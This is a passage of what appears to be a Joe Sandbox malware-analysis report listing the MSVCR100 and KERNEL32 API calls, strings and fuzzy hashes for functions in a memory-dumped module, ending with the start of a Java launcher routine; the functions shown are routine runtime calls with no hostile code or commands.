                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000030,6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7E14
                                                                                                          • __doserrno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E21
                                                                                                          • _errno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E28
                                                                                                          • __doserrno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E41
                                                                                                          • _errno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E48
                                                                                                          • _errno.MSVCR100 ref: 6FDF7E8E
                                                                                                          • GetFileType.KERNEL32(?,6FDA7DA5,000000FF,?), ref: 6FDF7EB5
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF7ED7
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF7EDE
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF7F47
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF7F7F
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF7FC1
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7FD7
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF8033
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF8049
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF80A5
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF80BB
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD23DF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD23EA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD240F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD241A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 1328987296-1036084923
                                                                                                          • Opcode ID: f1970bc085a3d7dbe18b22610e4fb937b64b0b3c669f9f4327e3060eb9e5d2ee
                                                                                                          • Instruction ID: c09d6062738182b4420e5da15d53232a1185fddad306b00c88c3f79161dbd4cf
                                                                                                          • Opcode Fuzzy Hash: f1970bc085a3d7dbe18b22610e4fb937b64b0b3c669f9f4327e3060eb9e5d2ee
                                                                                                          • Instruction Fuzzy Hash: FC31A271805708EBDB92AFA4CD80D8D3BB5AF4136DF214256F830AB1D0EB71BA909771
                                                                                                          APIs
                                                                                                          • wcschr.MSVCR100(00000000,0000003D,7650DF80,00000000,00000000), ref: 6FD91FE5
                                                                                                          • free.MSVCR100(?,7650DF80,00000000,00000000), ref: 6FD92058
                                                                                                          • _errno.MSVCR100(7650DF80,00000000,00000000), ref: 6FD97450
                                                                                                          • _errno.MSVCR100(00000000), ref: 6FDB146B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6FDB1476
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfofreewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 655308977-0
                                                                                                          • Opcode ID: 5ee245bdb56e0da3510286ef0193e182249b74e682f7392791f27fa63dadf27f
                                                                                                          • Instruction ID: 64ae75237726fb702034aef895a14c5426253b668664597dfb4422d55b3fa7ec
                                                                                                          • Opcode Fuzzy Hash: 5ee245bdb56e0da3510286ef0193e182249b74e682f7392791f27fa63dadf27f
                                                                                                          • Instruction Fuzzy Hash: BF71B5B1505714EFCB528FB4D88199D7BB5EF06B28B21451FE426DB1D0EB30B981CBA1
                                                                                                          APIs
                                                                                                          • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9216B
                                                                                                            • Part of subcall function 6FD9212D: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6FD92170,00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9213A
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,7650DFF0), ref: 6FD921D2
                                                                                                          • _errno.MSVCR100(00000000,00000000,7650DFF0), ref: 6FD921E4
                                                                                                          • _errno.MSVCR100(7650DFF0), ref: 6FDB1B7B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(7650DFF0), ref: 6FDB1B86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3491722712-0
                                                                                                          • Opcode ID: 3ea4d2a761e4bbe81f5903855198aa729097410990e8e3a87fc79181cdcfe07d
                                                                                                          • Instruction ID: dcf6889ad6198848244e0230e2d6b34ae0462b37fdf0366391c0b2e0453f286a
                                                                                                          • Opcode Fuzzy Hash: 3ea4d2a761e4bbe81f5903855198aa729097410990e8e3a87fc79181cdcfe07d
                                                                                                          • Instruction Fuzzy Hash: 3061B7B2905305DFDB909FA4DCC099D7BB1FF06328B21066ED665EB180DB307A91CB61
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC035A: TlsGetValue.KERNEL32(6FDB6175), ref: 6FDC036C
                                                                                                          • TlsGetValue.KERNEL32 ref: 6FDCA759
                                                                                                          • DebugBreak.KERNEL32 ref: 6FDCA763
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCA79B
                                                                                                          • swprintf_s.MSVCR100(?,00000400,[%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d),00000000), ref: 6FDCA7CB
                                                                                                          • fwprintf.MSVCR100(?), ref: 6FDCA80D
                                                                                                          • fflush.MSVCR100(?), ref: 6FDCA818
                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 6FDCA827
                                                                                                          • DebugBreak.KERNEL32 ref: 6FDCA82D
                                                                                                          • exit.MSVCR100(000000F8), ref: 6FDCA835
                                                                                                          Strings
                                                                                                          • [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6FDCA840, 6FDCA7BA
                                                                                                          • [%d] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6FDCA7E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Debug$BreakValue$CurrentOutputStringThreadexitfflushfwprintfswprintf_s
                                                                                                          • String ID: [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d)$[%d] %S: !!!!!!!Assert Failed(%S: %d)
                                                                                                          • API String ID: 179563127-813932914
                                                                                                          • Opcode ID: f35c1e3e050766d4aa292d5c001af008185e7e0c455ab2efb83a22e24dcfff4c
                                                                                                          • Instruction ID: 16304c651cc9698ba2ff9ba90fb402ac43830f407107f423d38326bb17f52f17
                                                                                                          • Opcode Fuzzy Hash: f35c1e3e050766d4aa292d5c001af008185e7e0c455ab2efb83a22e24dcfff4c
                                                                                                          • Instruction Fuzzy Hash: 8051EAB29083D49FDB42CFB48C685457FB8BF56214B0882DFE485DB1D2EB34A945CB62
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCEC90
                                                                                                          • _errno.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCEC9B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECA6
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _getdrive.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECB2
                                                                                                          • _errno.MSVCR100(?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECC8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECD3
                                                                                                          • GetFullPathNameA.KERNEL32(0000002E,00000000,?,0000002E,?,?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C), ref: 6FDCED1A
                                                                                                          • _errno.MSVCR100(?,?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCED29
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$FullNamePath__doserrno_getdrive_invalid_parameter
                                                                                                          • String ID: .$:.
                                                                                                          • API String ID: 366288646-2811378331
                                                                                                          • Opcode ID: 903f74c74622612975d534a39223298c58884333e413f5b2368ac0aebf51ae14
                                                                                                          • Instruction ID: b5e38ecf8e641571a3973ca9684fd4e30b4463df200be87d22494edceeac988f
                                                                                                          • Opcode Fuzzy Hash: 903f74c74622612975d534a39223298c58884333e413f5b2368ac0aebf51ae14
                                                                                                          • Instruction Fuzzy Hash: A031B0B550034AEBEB919FB4CE41B9E3BACEF41354F144566E9209B180EB70F9418772
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BB8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BC2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                            • Part of subcall function 6FDD6D74: _unlock_file.MSVCR100(?,6FDD6D32,6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D7A
                                                                                                            • Part of subcall function 6FDD6D74: _unlock.MSVCR100(00000002,6FDD6D32,6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D82
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BDA
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D39
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo_unlock_unlock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3680532398-0
                                                                                                          • Opcode ID: ca8c31ee52c246efc6c50748704c9cd78fd26502a6e5184a6d500d0e17db435f
                                                                                                          • Instruction ID: e8cf9fc7c80c5293ff43f54fa29487457484c58479d3c505f450a09fc29ebd96
                                                                                                          • Opcode Fuzzy Hash: ca8c31ee52c246efc6c50748704c9cd78fd26502a6e5184a6d500d0e17db435f
                                                                                                          • Instruction Fuzzy Hash: 88519371905309DADB80AFA8D881B9D7BB4BF0B358F10812AF564AF2C1DB7479418BE5
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC1F1
                                                                                                          • memset.MSVCR100(00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC1FD
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC214
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC232
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC25A
                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 6FDBC261
                                                                                                          • memset.MSVCR100(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC27D
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC29D
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC2E8
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC2F9
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC310
                                                                                                          • free.MSVCR100(?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$Process$AffinityCurrentMaskfree
                                                                                                          • String ID: $$$
                                                                                                          • API String ID: 1945224313-233714265
                                                                                                          • Opcode ID: 9f4ebf6bf144a3297ba1ec84f250b9ac9fbd776d319135f7a0999a2118c9e6a2
                                                                                                          • Instruction ID: aeea24914e428df4fbf24d65228d4f81d9ed272e1590ef838bf7c29cc5810da8
                                                                                                          • Opcode Fuzzy Hash: 9f4ebf6bf144a3297ba1ec84f250b9ac9fbd776d319135f7a0999a2118c9e6a2
                                                                                                          • Instruction Fuzzy Hash: 9F8170B0A05614EFCB84DF68C59096DBBB4FB0A315750815FE806DB290DB71F961CF91
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000008,32054ECC,?,?), ref: 6FDC015F
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(32054ECC,?,?), ref: 6FDC019A
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,32054ECC,?,?), ref: 6FDC01B3
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,32054ECC,?,?), ref: 6FDC01CE
                                                                                                          • memset.MSVCR100(?,00000000,?,32054ECC,?,?), ref: 6FDC01E2
                                                                                                          • memset.MSVCR100(?,00000000,?,32054ECC,?,?), ref: 6FDC01F5
                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,32054ECC,?,?), ref: 6FDC0245
                                                                                                          • GetLastError.KERNEL32(?,?,?,32054ECC,?,?), ref: 6FDC0255
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,32054ECC,?,?), ref: 6FDC026E
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,32054ECC,?,?), ref: 6FDC027D
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,32054ECC,?,?), ref: 6FDC0284
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,32054ECC,?,?), ref: 6FDC02B1
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,?,?,?,32054ECC,?,?), ref: 6FDC02C2
                                                                                                            • Part of subcall function 6FDC16D1: memset.MSVCR100(?,00000000,0000003E,00000000,00000000), ref: 6FDC16F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$??2@Concurrency@@$??0scheduler_resource_allocation_error@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                                                                                          • String ID: `so
                                                                                                          • API String ID: 4229121664-3409735833
                                                                                                          • Opcode ID: 047965adeba1fb3ba84b603d763cd5638615dc5acef7bc70443d1968ed9d22d3
                                                                                                          • Instruction ID: 01fba0cd98465ccd4629f87e00bf8cc5033c6fdd32e913046042d412ac6b3d20
                                                                                                          • Opcode Fuzzy Hash: 047965adeba1fb3ba84b603d763cd5638615dc5acef7bc70443d1968ed9d22d3
                                                                                                          • Instruction Fuzzy Hash: 915191B15047019FD764DF38D885B6ABBE8FB49364F104A2EE16ACB2D0EB31B8418B51
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000D,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82857
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82869
                                                                                                          • _lock.MSVCR100(0000000C,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82885
                                                                                                          • free.MSVCR100(00000000,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD828B9
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7615
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7621
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA762D
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7639
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7645
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7651
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA765D
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7669
                                                                                                          • free.MSVCR100(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7675
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_lock$CriticalDecrementEnterInterlockedSection
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 3254847666-2441139153
                                                                                                          • Opcode ID: a3fadc6cd65ffe7009e3cfbf96ae85d5e025f871cda066be800fdea3fb851815
                                                                                                          • Instruction ID: f04f6b7d25e81eae20430647f80f79227176acd461ae08471cc37b3894e86b57
                                                                                                          • Opcode Fuzzy Hash: a3fadc6cd65ffe7009e3cfbf96ae85d5e025f871cda066be800fdea3fb851815
                                                                                                          • Instruction Fuzzy Hash: A431B272646B01EADFD05B789E48B0E37B86F02B6EF24151ED4B49B1C4EB35F0808674
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCE9DC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE9E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCE9EF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • SetCurrentDirectoryA.KERNEL32(?), ref: 6FDCE9FF
                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 6FDCEA19
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000001), ref: 6FDCEA2F
                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000001,00000000), ref: 6FDCEA4C
                                                                                                          • _mbctoupper.MSVCR100(?), ref: 6FDCEA72
                                                                                                          • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 6FDCEA8F
                                                                                                          • free.MSVCR100(?), ref: 6FDCEABB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$EnvironmentVariable__doserrno_calloc_crt_errno_invalid_parameter_invalid_parameter_noinfo_mbctoupperfree
                                                                                                          • String ID: :$=
                                                                                                          • API String ID: 3457832400-2134709475
                                                                                                          • Opcode ID: f8eb7fddfd07524d176d6b7627f9824bad338e253078771ae64ae70c8cbfcbb0
                                                                                                          • Instruction ID: ca62136d8172a180669516d75d3c61f881696d5e6e1824aec71e9a9585da342a
                                                                                                          • Opcode Fuzzy Hash: f8eb7fddfd07524d176d6b7627f9824bad338e253078771ae64ae70c8cbfcbb0
                                                                                                          • Instruction Fuzzy Hash: 4131F3B19007689FDBA08B65CC067D977FCBF06324F14028AE165D7180DB70BA858EB2
                                                                                                          APIs
                                                                                                          • getenv.MSVCR100(_JAVA_LAUNCHER_DEBUG), ref: 00D01008
                                                                                                          • printf.MSVCR100(Windows original main args:), ref: 00D01020
                                                                                                          • printf.MSVCR100(wwwd_args[%d] = %s,00000000,?), ref: 00D0103E
                                                                                                          • GetCommandLineA.KERNEL32 ref: 00D0104D
                                                                                                          • JLI_CmdToArgs.JLI(00000000), ref: 00D01054
                                                                                                          • JLI_GetStdArgc.JLI(00000000), ref: 00D01059
                                                                                                          • JLI_MemAlloc.JLI(00000000,00000000), ref: 00D01068
                                                                                                          • JLI_GetStdArgs.JLI ref: 00D01071
